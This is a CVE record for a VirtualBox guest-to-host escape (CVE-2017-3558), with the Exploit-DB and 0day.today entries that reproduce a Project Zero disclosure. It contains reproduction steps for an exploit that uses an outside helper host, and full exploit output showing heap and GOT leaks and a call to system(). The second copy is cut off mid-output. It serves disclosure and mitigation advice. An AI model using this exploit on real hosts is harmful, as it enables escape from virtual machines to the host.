ID: CVE-2017-3558
Type: cve
Reporter: cve@mitre.org
Modified: 2019-10-03T00:03:00
Description
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are Prior to 5.0.38 and Prior to 5.1.20. Easily "exploitable" vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data and unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 8.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).
{"exploitdb": [{"lastseen": "2018-11-30T12:32:47", "bulletinFamily": "exploit", "description": "", "modified": "2017-04-20T00:00:00", "published": "2017-04-20T00:00:00", "id": "EDB-ID:41904", "href": "https://www.exploit-db.com/exploits/41904", "type": "exploitdb", "title": "Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086\r\n\r\nThere is a vulnerability in VirtualBox that permits an attacker with\r\nroot privileges in a virtual machine with a NAT network interface to\r\ncorrupt the memory of the userspace host process and leak memory\r\ncontents from the userspace host process. This probably permits an\r\nattacker with root privileges inside the guest to execute arbitrary\r\ncode in userspace context on the host.\r\n\r\nThe issue is in the copy of slirp that is shipped in VirtualBox, in\r\nthe function ip_input() in src/VBox/Devices/Network/slirp/ip_input.c:\r\n\r\nvoid\r\nip_input(PNATState pData, struct mbuf *m)\r\n{\r\n register struct ip *ip;\r\n [...]\r\n ip = mtod(m, struct ip *);\r\n [...]\r\n {\r\n [...]\r\n /*\r\n * XXX: TODO: this is most likely a leftover spooky action at\r\n * a distance from alias_dns.c host resolver code and can be\r\n * g/c'ed.\r\n */\r\n if (m->m_len != RT_N2H_U16(ip->ip_len))\r\n m->m_len = RT_N2H_U16(ip->ip_len);\r\n }\r\n [...]\r\n}\r\n\r\nThis code does not seem to be present in the upstream version of\r\nslirp.\r\n\r\nThe assignment `m->m_len = RT_N2H_U16(ip->ip_len)` overwrites the\r\ntrusted length field `m_len` of the buffer `m` with the untrusted\r\nlength field in the IP header of the received packet. At this point,\r\nthe IP header has not been validated at all. 
All following code that\r\nprocesses packets relies on the correctness of `m->m_len`, so by\r\nsending an IP header with a bogus length field, an attacker can cause\r\nall following code to operate on out-of-bounds data.\r\n\r\nIn particular, an attacker can use this bug to obtain the following\r\nattack primitives:\r\n\r\n - The attacker can leak out-of-bounds heap data by sending a UDP\r\n packet to a host on the internet with checksum 0 and a bogus length\r\n field in the IP header.\r\n The host process will send a (possibly fragmented) UDP packet to\r\n the specified host on the internet that includes out-of-bounds heap\r\n data.\r\n This method requires a cooperating host on the internet that the VM\r\n can talk to using the NAT network interface.\r\n - The attacker can leak out-of-bounds heap data by sending an ICMP\r\n Echo Request with a bogus length field in the IP header\r\n to the CTL_DNS address. The VM host then responds with an ICMP Echo\r\n Reply that includes out-of-bounds heap data.\r\n This approach has the advantage of not requiring a cooperating,\r\n reachable server on the internet, but has the disadvantage that\r\n the attacker needs to guess the 16-bit ICMP checksum.\r\n - The attacker can corrupt the heap by sending a UDP packet with a\r\n bogus length whose IP header contains IP options. The host process\r\n will then attempt to strip the IP headers via ip_input -> udp_input\r\n -> ip_stripoptions -> memcpy, which moves the IP payload - including\r\n out-of-bounds heap data - to a lower address. This can\r\n in particular be abused to overwrite a slirp heap chunk header\r\n (struct item) with attacker-controlled packet data.\r\n\r\nI have attached a crash PoC. Copy it into a VM whose only network\r\ninterface is a NAT interface, compile it with\r\n\"gcc -o crasher crasher.c\" and run it with \"sudo ./crasher\". 
The VM\r\nshould die after a few seconds, with something like this appearing in\r\ndmesg on the host:\r\n\r\n[107463.674598] traps: EMT-0[66638] general protection ip:7fc6a26076e8 sp:7fc6d2e27ad0 error:0 in VBoxDD.so[7fc6a24e2000+36d000]\r\n\r\nI have tested my crasher in VirtualBox version \"5.1.14 r112924\".\r\n\r\nThe bug was introduced in SVN revision\r\n<https://www.virtualbox.org/changeset/23155/vbox>.\r\n\r\n################################################################################\r\n\r\nWithout modifications,\r\nthe exploit should work under the following conditions:\r\n\r\n - host runs Ubuntu 14.04 (trusty), 64-bit\r\n - host uses libc6 package version 2.19-0ubuntu6.9 (most recent\r\n version)\r\n - VirtualBox version is 5.1.14~112924~Ubuntu~trusty (official build)\r\n (most recent version)\r\n - guest runs Linux\r\n - main network interface of the VM is a NAT interface (default\r\n config)\r\n\r\nThe exploit is able to run an arbitrary shell command on the host\r\nsystem. The command is hardcoded to \"id > /tmp/owned_from_guest\".\r\n\r\n\r\nSome things about the exploit that might be of interest to you:\r\n\r\nThe exploit operates on memory that belongs to the zone zone_clust of\r\nthe UMA heap.\r\nThe UMA heap is relatively easy to attack, partly because the sanity\r\nchecks are compiled out in userland code in release builds. For\r\nexample, the check\r\n`Assert((zone->magic == ZONE_MAGIC && zone == it->zone))` in\r\numa_zfree_arg() becomes a no-op, and the LIST_CHECKs in LIST_REMOVE()\r\nhave no effect. 
In particular, because the `zone == it->zone`\r\nassertion is not compiled into release builds, an attacker who can\r\noverwrite an item header and point its member ->zone to a controlled\r\nmemory area can cause an arbitrary function it->zone->pfFini to be\r\ncalled when the item whose header was overwritten is freed.\r\nIt might make sense to turn assertions in the allocator into something\r\nthat is also active in release builds.\r\n\r\nFor exploiting the bug, it was very helpful that the VirtualBox binary\r\nis built as non-relocatable, meaning that the binary is always loaded\r\nat the same virtual address. The exploit uses a hardcoded address to\r\nleak the contents of the GOT (global offset table), which can then be\r\nused to locate the addresses of libc functions.\r\nIt's probably a good idea to build the VirtualBox binaries as\r\nrelocatable code to prevent attacks from simply using\r\nhardcoded addresses - and this mitigation is pretty simple to\r\nimplement, you just have to add some compiler flags (`-pie -fPIE`\r\nor so). To verify that it's working, run VirtualBox, then as root,\r\ngrep the contents of /proc/{pid of VirtualBox}/maps for VirtualBox and\r\nverify that the mappings don't have low ranges like 00400000-00408000,\r\nbut use high addresses like 7ffb0f62e000 instead.\r\n\r\nAs far as I can tell from the source, on a Linux or Mac host, an\r\nattacker who has compromised the VM host process can also run\r\narbitrary code in the host kernel using the ioctls SUP_IOCTL_LDR_OPEN\r\nand SUP_IOCTL_LDR_LOAD. 
If that is indeed the case, it might make\r\nsense to reduce the privileges of the userland host code by\r\nsandboxing components like the shared folder host and the NAT\r\nimplementation and/or by rearchitecting VirtualBox so that the host\r\nkernel doesn't trust the host userland binary.\r\n\r\n\r\nTo reproduce the bug with the attached exploit:\r\n\r\n - On the host or some other box on the internet, compile and run the\r\n helper:\r\n\r\n $ gcc -o helper helper.c -Wall\r\n $ ./helper \r\n\r\n - In the guest, compile the exploit:\r\n\r\n # gcc -o bcs bcs.c -Wall -std=gnu99\r\n\r\n (This may throw some harmless format string warnings depending on\r\n whether the guest is 64-bit.)\r\n\r\n - To improve reliability, ensure that the guest isn't\r\n running any network services or clients, save the guest VM and\r\n restore it. (Saving and restoring the guest resets the Slirp heap.)\r\n\r\n - In the guest, as root, run the exploit. Pass the helper host's IP\r\n address as argument.\r\n\r\n # ./bcs xxx.xxx.xxx.xxx\r\n\r\n - If the exploit was successful, there should be a new file\r\n \"/tmp/owned_from_guest\" on the host that contains the output of the\r\n \"id\" command.\r\n\r\nA successful run of the exploit should look like this:\r\n\r\n==================================================================\r\n# ./bcs {censored}\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* dev \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\nenp0s3\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* src \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.15\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* via \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.2\r\n================================\r\nsystemf: <<<ping -c3 -w4 10.0.2.2>>>\r\nPING 10.0.2.2 (10.0.2.2) 56(84) bytes of data.\r\n64 bytes from 10.0.2.2: icmp_seq=2 ttl=64 time=0.375 ms\r\n64 bytes from 10.0.2.2: icmp_seq=3 ttl=64 
time=0.277 ms\r\n64 bytes from 10.0.2.2: icmp_seq=4 ttl=64 time=0.297 ms\r\n\r\n--- 10.0.2.2 ping statistics ---\r\n4 packets transmitted, 3 received, 25% packet loss, time 3054ms\r\nrtt min/avg/max/mdev = 0.277/0.316/0.375/0.044 ms\r\n\r\n================================\r\nsystemf: <<<arp -s 10.0.2.2 01:23:45:67:89:ab>>>\r\nsystemf: <<<iptables -I OUTPUT -o enp0s3 -j DROP>>>\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 58 3e 26 35 56 7f 00 00 |........X>&5V...|\r\n00000020 18 2e 26 35 56 7f 00 00 |..&5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f5635263e58\r\nprev: 0x7f5635262e00\r\ndefragging...\r\ndefragged\r\nplaced shell command at 0x7f5635263676\r\nfreelist head at 0x7f5648b4e690\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 a0 ec 25 35 56 7f 00 00 |..........%5V...|\r\n00000020 60 dc 25 35 56 7f 00 00 |`.%5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f563525eca0\r\nprev: 0x7f563525dc48\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525fd42, fake_zone at 0x7f563525fd4a\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525f516, fake_zone at 0x7f563525f51e\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525ecea, fake_zone at 0x7f563525ecf2\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525e4be, fake_zone at 0x7f563525e4c6\r\nsend_udp_datashift(shift_amount=40, data_length=9368)\r\nsend_udp_datashift(shift_amount=36, data_length=9368)\r\nsending packet2, ip_off=0x28, ip_id=0x1a\r\ntrying to leak GOT from fake chunk...\r\n\r\ngot UDP, 
len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\ndefragging...\r\ndefragged\r\n\r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010 b0 09 c0 97 56 7f 00 00 b6 0f 40 00 00 00 00 00 |....V.....@.....|\r\n00000020 10 9d c3 97 56 7f 00 00 a0 a0 c3 97 56 7f 00 00 |....V.......V...|\r\n00000030 e6 0f 40 00 00 00 00 00 90 28 c7 97 56 7f 00 00 |..@......(..V...|\r\n00000040 20 9d c3 97 56 7f 00 00 e0 03 15 98 56 7f 00 00 | ...V.......V...|\r\n00000050 26 10 40 00 00 00 00 00 36 10 40 00 00 00 00 00 |&.@.....6.@.....|\r\n00000060 50 9e b9 97 56 7f 00 00 56 10 40 00 00 00 00 00 |P...V...V.@.....|\r\n00000070 80 30 c6 97 56 7f 00 00 10 fc c0 97 56 7f 00 00 |.0..V.......V...|\r\n00000080 86 10 40 00 00 00 00 00 96 10 40 00 00 00 00 00 |..@.......@.....|\r\n00000090 c0 fe c0 97 56 7f 00 00 80 2c c7 97 56 7f 00 00 |....V....,..V...|\r\n000000a0 d0 9f c3 97 56 7f 00 00 30 9d c3 97 56 7f 00 00 |....V...0...V...|\r\n000000b0 60 28 c7 97 56 7f 00 00 90 e0 f3 97 56 7f 00 00 |`(..V.......V...|\r\n000000c0 70 c8 c6 97 56 7f 00 00 16 11 40 00 00 00 00 00 |p...V.....@.....|\r\n000000d0 30 0c c8 97 56 7f 00 00 a0 c8 c6 97 56 7f 00 00 |0...V.......V...|\r\n000000e0 60 c9 c6 97 56 7f 00 00 d0 0b 15 98 56 7f 00 00 |`...V.......V...|\r\n000000f0 66 11 40 00 00 00 00 00 76 11 40 00 00 00 00 00 |f.@.....v.@.....|\r\n00000100 86 11 40 00 00 00 00 00 96 11 40 00 00 00 00 00 |..@.......@.....|\r\n00000110 50 e1 f3 97 56 7f 00 00 b6 11 40 00 00 00 00 00 |P...V.....@.....|\r\n00000120 c6 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............|\r\n00000130 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|\r\n00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000160 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 |................|\r\n00000170 00 00 00 00 22 05 08 20 00 20 00 00 88 
13 00 00 |....\".. . ......|\r\n00000180 81 cb 05 00 02 00 00 00 b9 4b 40 00 00 00 00 00 |.........K@.....|\r\n00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n000001a0 00 00 00 00 00 00 00 00 2f 75 73 72 2f 6c 69 62 |......../usr/lib|\r\n000001b0 2f 76 69 72 74 75 61 6c 62 6f 78 00 56 69 72 74 |/virtualbox.Virt|\r\n000001c0 75 61 6c 42 6f 78 00 00 00 00 00 00 00 00 00 00 |ualBox..........|\r\n000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\nstrlen at 0x7f5697c009b0\r\nsystem() at 0x7f5697bbe590\r\ncalling system()...\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n\r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 84 cd 0f 35 56 7f 00 00 |...........5V...|\r\n00000020 44 bd 0f 35 56 7f 00 00 |D..5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f56350fcd84\r\nprev: 0x7f56350fbd2c\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f56350fc558, dummy_next at 0x7f56350fc5a2, fake_zone at 0x7f56350fc5aa\r\nsend_udp_datashift(shift_amount=40, data_length=3092)\r\nsend_udp_datashift(shift_amount=36, data_length=3092)\r\nsending packet2, ip_off=0xa, ip_id=0x27\r\ndid that work?\r\nsystemf: <<<iptables -D OUTPUT -o enp0s3 -j DROP>>>\r\n==================================================================\r\n\r\nIf the exploit crashes, you'll have to remove the firewall rule the\r\nexploit added with `iptables -D OUTPUT -o {interface} -j DROP` inside\r\nthe VM to restore network connectivity.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41904.zip", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41904"}], "zdt": [{"lastseen": "2018-04-14T01:52:01", 
"bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-04-21T00:00:00", "published": "2017-04-21T00:00:00", "href": "https://0day.today/exploit/description/27646", "id": "1337DAY-ID-27646", "type": "zdt", "title": "VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy Exploit", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1086\r\n \r\nThere is a vulnerability in VirtualBox that permits an attacker with\r\nroot privileges in a virtual machine with a NAT network interface to\r\ncorrupt the memory of the userspace host process and leak memory\r\ncontents from the userspace host process. This probably permits an\r\nattacker with root privileges inside the guest to execute arbitrary\r\ncode in userspace context on the host.\r\n \r\nThe issue is in the copy of slirp that is shipped in VirtualBox, in\r\nthe function ip_input() in src/VBox/Devices/Network/slirp/ip_input.c:\r\n \r\nvoid\r\nip_input(PNATState pData, struct mbuf *m)\r\n{\r\n register struct ip *ip;\r\n [...]\r\n ip = mtod(m, struct ip *);\r\n [...]\r\n {\r\n [...]\r\n /*\r\n * XXX: TODO: this is most likely a leftover spooky action at\r\n * a distance from alias_dns.c host resolver code and can be\r\n * g/c'ed.\r\n */\r\n if (m->m_len != RT_N2H_U16(ip->ip_len))\r\n m->m_len = RT_N2H_U16(ip->ip_len);\r\n }\r\n [...]\r\n}\r\n \r\nThis code does not seem to be present in the upstream version of\r\nslirp.\r\n \r\nThe assignment `m->m_len = RT_N2H_U16(ip->ip_len)` overwrites the\r\ntrusted length field `m_len` of the buffer `m` with the untrusted\r\nlength field in the IP header of the received packet. At this point,\r\nthe IP header has not been validated at all. 
All following code that\r\nprocesses packets relies on the correctness of `m->m_len`, so by\r\nsending an IP header with a bogus length field, an attacker can cause\r\nall following code to operate on out-of-bounds data.\r\n \r\nIn particular, an attacker can use this bug to obtain the following\r\nattack primitives:\r\n \r\n - The attacker can leak out-of-bounds heap data by sending a UDP\r\n packet to a host on the internet with checksum 0 and a bogus length\r\n field in the IP header.\r\n The host process will send a (possibly fragmented) UDP packet to\r\n the specified host on the internet that includes out-of-bounds heap\r\n data.\r\n This method requires a cooperating host on the internet that the VM\r\n can talk to using the NAT network interface.\r\n - The attacker can leak out-of-bounds heap data by sending an ICMP\r\n Echo Request with a bogus length field in the IP header\r\n to the CTL_DNS address. The VM host then responds with an ICMP Echo\r\n Reply that includes out-of-bounds heap data.\r\n This approach has the advantage of not requiring a cooperating,\r\n reachable server on the internet, but has the disadvantage that\r\n the attacker needs to guess the 16-bit ICMP checksum.\r\n - The attacker can corrupt the heap by sending a UDP packet with a\r\n bogus length whose IP header contains IP options. The host process\r\n will then attempt to strip the IP headers via ip_input -> udp_input\r\n -> ip_stripoptions -> memcpy, which moves the IP payload - including\r\n out-of-bounds heap data - to a lower address. This can\r\n in particular be abused to overwrite a slirp heap chunk header\r\n (struct item) with attacker-controlled packet data.\r\n \r\nI have attached a crash PoC. Copy it into a VM whose only network\r\ninterface is a NAT interface, compile it with\r\n\"gcc -o crasher crasher.c\" and run it with \"sudo ./crasher\". 
The VM\r\nshould die after a few seconds, with something like this appearing in\r\ndmesg on the host:\r\n \r\n[107463.674598] traps: EMT-0[66638] general protection ip:7fc6a26076e8 sp:7fc6d2e27ad0 error:0 in VBoxDD.so[7fc6a24e2000+36d000]\r\n \r\nI have tested my crasher in VirtualBox version \"5.1.14 r112924\".\r\n \r\nThe bug was introduced in SVN revision\r\n<https://www.virtualbox.org/changeset/23155/vbox>.\r\n \r\n################################################################################\r\n \r\nWithout modifications,\r\nthe exploit should work under the following conditions:\r\n \r\n - host runs Ubuntu 14.04 (trusty), 64-bit\r\n - host uses libc6 package version 2.19-0ubuntu6.9 (most recent\r\n version)\r\n - VirtualBox version is 5.1.14~112924~Ubuntu~trusty (official build)\r\n (most recent version)\r\n - guest runs Linux\r\n - main network interface of the VM is a NAT interface (default\r\n config)\r\n \r\nThe exploit is able to run an arbitrary shell command on the host\r\nsystem. The command is hardcoded to \"id > /tmp/owned_from_guest\".\r\n \r\n \r\nSome things about the exploit that might be of interest to you:\r\n \r\nThe exploit operates on memory that belongs to the zone zone_clust of\r\nthe UMA heap.\r\nThe UMA heap is relatively easy to attack, partly because the sanity\r\nchecks are compiled out in userland code in release builds. For\r\nexample, the check\r\n`Assert((zone->magic == ZONE_MAGIC && zone == it->zone))` in\r\numa_zfree_arg() becomes a no-op, and the LIST_CHECKs in LIST_REMOVE()\r\nhave no effect. 
In particular, because the `zone == it->zone`\r\nassertion is not compiled into release builds, an attacker who can\r\noverwrite an item header and point its member ->zone to a controlled\r\nmemory area can cause an arbitrary function it->zone->pfFini to be\r\ncalled when the item whose header was overwritten is freed.\r\nIt might make sense to turn assertions in the allocator into something\r\nthat is also active in release builds.\r\n \r\nFor exploiting the bug, it was very helpful that the VirtualBox binary\r\nis built as non-relocatable, meaning that the binary is always loaded\r\nat the same virtual address. The exploit uses a hardcoded address to\r\nleak the contents of the GOT (global offset table), which can then be\r\nused to locate the addresses of libc functions.\r\nIt's probably a good idea to build the VirtualBox binaries as\r\nrelocatable code to prevent attacks from simply using\r\nhardcoded addresses - and this mitigation is pretty simple to\r\nimplement, you just have to add some compiler flags (`-pie -fPIE`\r\nor so). To verify that it's working, run VirtualBox, then as root,\r\ngrep the contents of /proc/{pid of VirtualBox}/maps for VirtualBox and\r\nverify that the mappings don't have low ranges like 00400000-00408000,\r\nbut use high addresses like 7ffb0f62e000 instead.\r\n \r\nAs far as I can tell from the source, on a Linux or Mac host, an\r\nattacker who has compromised the VM host process can also run\r\narbitrary code in the host kernel using the ioctls SUP_IOCTL_LDR_OPEN\r\nand SUP_IOCTL_LDR_LOAD. 
If that is indeed the case, it might make\r\nsense to reduce the privileges of the userland host code by\r\nsandboxing components like the shared folder host and the NAT\r\nimplementation and/or by rearchitecting VirtualBox so that the host\r\nkernel doesn't trust the host userland binary.\r\n \r\n \r\nTo reproduce the bug with the attached exploit:\r\n \r\n - On the host or some other box on the internet, compile and run the\r\n helper:\r\n \r\n $ gcc -o helper helper.c -Wall\r\n $ ./helper \r\n \r\n - In the guest, compile the exploit:\r\n \r\n # gcc -o bcs bcs.c -Wall -std=gnu99\r\n \r\n (This may throw some harmless format string warnings depending on\r\n whether the guest is 64-bit.)\r\n \r\n - To improve reliability, ensure that the guest isn't\r\n running any network services or clients, save the guest VM and\r\n restore it. (Saving and restoring the guest resets the Slirp heap.)\r\n \r\n - In the guest, as root, run the exploit. Pass the helper host's IP\r\n address as argument.\r\n \r\n # ./bcs xxx.xxx.xxx.xxx\r\n \r\n - If the exploit was successful, there should be a new file\r\n \"/tmp/owned_from_guest\" on the host that contains the output of the\r\n \"id\" command.\r\n \r\nA successful run of the exploit should look like this:\r\n \r\n==================================================================\r\n# ./bcs {censored}\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* dev \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\nenp0s3\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* src \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.15\r\n================================\r\nsystemf: <<<ip route get 8.8.8.8 | grep ' dev ' | sed 's|.* via \\([^ ]*\\) .*|\\1|' | tr -d '\\n'>>>\r\n10.0.2.2\r\n================================\r\nsystemf: <<<ping -c3 -w4 10.0.2.2>>>\r\nPING 10.0.2.2 (10.0.2.2) 56(84) bytes of data.\r\n64 bytes from 10.0.2.2: icmp_seq=2 ttl=64 time=0.375 ms\r\n64 bytes from 10.0.2.2: 
icmp_seq=3 ttl=64 time=0.277 ms\r\n64 bytes from 10.0.2.2: icmp_seq=4 ttl=64 time=0.297 ms\r\n \r\n--- 10.0.2.2 ping statistics ---\r\n4 packets transmitted, 3 received, 25% packet loss, time 3054ms\r\nrtt min/avg/max/mdev = 0.277/0.316/0.375/0.044 ms\r\n \r\n================================\r\nsystemf: <<<arp -s 10.0.2.2 01:23:45:67:89:ab>>>\r\nsystemf: <<<iptables -I OUTPUT -o enp0s3 -j DROP>>>\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 58 3e 26 35 56 7f 00 00 |........X>&5V...|\r\n00000020 18 2e 26 35 56 7f 00 00 |..&5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f5635263e58\r\nprev: 0x7f5635262e00\r\ndefragging...\r\ndefragged\r\nplaced shell command at 0x7f5635263676\r\nfreelist head at 0x7f5648b4e690\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 a0 ec 25 35 56 7f 00 00 |..........%5V...|\r\n00000020 60 dc 25 35 56 7f 00 00 |`.%5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f563525eca0\r\nprev: 0x7f563525dc48\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525fd42, fake_zone at 0x7f563525fd4a\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525f516, fake_zone at 0x7f563525f51e\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525ecea, fake_zone at 0x7f563525ecf2\r\nfake zone packet item at 0x7f563525e474, dummy_next at 0x7f563525e4be, fake_zone at 0x7f563525e4c6\r\nsend_udp_datashift(shift_amount=40, data_length=9368)\r\nsend_udp_datashift(shift_amount=36, data_length=9368)\r\nsending packet2, ip_off=0x28, ip_id=0x1a\r\ntrying to leak GOT from fake chunk...\r\n \r\ngot 
UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\ndefragging...\r\ndefragged\r\n \r\ngot UDP, len=540\r\nleak_udp successful\r\n00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n00000010 b0 09 c0 97 56 7f 00 00 b6 0f 40 00 00 00 00 00 |....V.....@.....|\r\n00000020 10 9d c3 97 56 7f 00 00 a0 a0 c3 97 56 7f 00 00 |....V.......V...|\r\n00000030 e6 0f 40 00 00 00 00 00 90 28 c7 97 56 7f 00 00 |..@......(..V...|\r\n00000040 20 9d c3 97 56 7f 00 00 e0 03 15 98 56 7f 00 00 | ...V.......V...|\r\n00000050 26 10 40 00 00 00 00 00 36 10 40 00 00 00 00 00 |&.@.....6.@.....|\r\n00000060 50 9e b9 97 56 7f 00 00 56 10 40 00 00 00 00 00 |P...V...V.@.....|\r\n00000070 80 30 c6 97 56 7f 00 00 10 fc c0 97 56 7f 00 00 |.0..V.......V...|\r\n00000080 86 10 40 00 00 00 00 00 96 10 40 00 00 00 00 00 |..@.......@.....|\r\n00000090 c0 fe c0 97 56 7f 00 00 80 2c c7 97 56 7f 00 00 |....V....,..V...|\r\n000000a0 d0 9f c3 97 56 7f 00 00 30 9d c3 97 56 7f 00 00 |....V...0...V...|\r\n000000b0 60 28 c7 97 56 7f 00 00 90 e0 f3 97 56 7f 00 00 |`(..V.......V...|\r\n000000c0 70 c8 c6 97 56 7f 00 00 16 11 40 00 00 00 00 00 |p...V.....@.....|\r\n000000d0 30 0c c8 97 56 7f 00 00 a0 c8 c6 97 56 7f 00 00 |0...V.......V...|\r\n000000e0 60 c9 c6 97 56 7f 00 00 d0 0b 15 98 56 7f 00 00 |`...V.......V...|\r\n000000f0 66 11 40 00 00 00 00 00 76 11 40 00 00 00 00 00 |f.@.....v.@.....|\r\n00000100 86 11 40 00 00 00 00 00 96 11 40 00 00 00 00 00 |..@.......@.....|\r\n00000110 50 e1 f3 97 56 7f 00 00 b6 11 40 00 00 00 00 00 |P...V.....@.....|\r\n00000120 c6 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 |..@.............|\r\n00000130 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................|\r\n00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000160 00 00 00 00 00 00 00 
00 0c 00 00 00 00 00 00 00 |................|\r\n00000170 00 00 00 00 22 05 08 20 00 20 00 00 88 13 00 00 |....\".. . ......|\r\n00000180 81 cb 05 00 02 00 00 00 b9 4b 40 00 00 00 00 00 |.........K@.....|\r\n00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n000001a0 00 00 00 00 00 00 00 00 2f 75 73 72 2f 6c 69 62 |......../usr/lib|\r\n000001b0 2f 76 69 72 74 75 61 6c 62 6f 78 00 56 69 72 74 |/virtualbox.Virt|\r\n000001c0 75 61 6c 42 6f 78 00 00 00 00 00 00 00 00 00 00 |ualBox..........|\r\n000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000200\r\nstrlen at 0x7f5697c009b0\r\nsystem() at 0x7f5697bbe590\r\ncalling system()...\r\ndefragging...\r\ndefragged\r\ntrying to leak...\r\n \r\ngot UDP, len=68\r\nleak_udp successful\r\ngot data\r\n00000000 01 00 ad de 00 00 00 00 00 e6 b4 48 56 7f 00 00 |...........HV...|\r\n00000010 01 00 00 00 00 00 00 00 84 cd 0f 35 56 7f 00 00 |...........5V...|\r\n00000020 44 bd 0f 35 56 7f 00 00 |D..5V...|\r\n00000028\r\nmagic: 0xdead0001\r\nzone: 0x7f5648b4e600\r\nrefcount: 0x1\r\nnext: 0x7f56350fcd84\r\nprev: 0x7f56350fbd2c\r\ndefragging...\r\ndefragged\r\nfake zone packet item at 0x7f56350fc558, dummy_next at 0x7f56350fc5a2, fake_zone at 